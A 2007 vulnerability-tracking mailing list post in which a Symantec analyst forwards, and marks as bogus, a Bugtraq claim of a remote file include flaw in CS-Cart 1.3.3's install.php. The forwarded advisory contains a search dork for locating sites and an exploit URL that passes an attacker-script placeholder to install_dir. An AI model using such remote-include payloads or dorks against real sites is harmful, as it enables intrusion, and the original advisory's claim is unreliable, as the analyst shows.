[VIM] [bogus] [ahmed_labib_hilmy at yahoo.com: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability] (fwd)

rkeith at securityfocus.com rkeith at securityfocus.com
Wed Jan 10 13:42:52 EST 2007



install_dir is has been set.

This issue is not a vuln



$install_dir = dirname(__FILE__);
$install_skins_dir = is_dir('./var/skins_repository') ? 'var/skins_repository'
: 'skins';
include $install_dir.'/core/install.php'


----- Forwarded message from ahmed_labib_hilmy at yahoo.com -----

From: ahmed_labib_hilmy at yahoo.com
Subject: CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability
To: bugtraq at securityfocus.com
Date: 9 Jan 2007 23:33:50 -0000
X-Mailer: MIME-tools 5.411 (Entity 5.404)
Message-ID: <20070109233350.31705.qmail at securityfocus.com>

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ CS-Cart 1.3.3 (install.php) Remote File Include Vulnerability
$$ Script site: http://www.cs-cart.com
$$ Dork: Powered by CS-Cart - Shopping Cart Software
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Found: irvian
$$
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$Greetz:ibnusina and all
$$ Specjal greetz:#hitamputih
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

$install_dir = dirname(__FILE__);
$install_skins_dir = is_dir('./var/skins_repository') ? 'var/skins_repository' 
: 'skins';
include $install_dir.'/core/install.php'

Expl:
http://www.site.com/[CS-Cart_path]/install.php?install_dir=[evil_scripts]

----- End forwarded message -----

-- 
Dave McKinney
Symantec

keyID: BF919DD7
key fingerprint = 494D 6B7D 4611 7A7A 5DBB  3B29 4D89 3A70 BF91 9DD7

--
Rob Keith
Symantec


More information about the VIM mailing list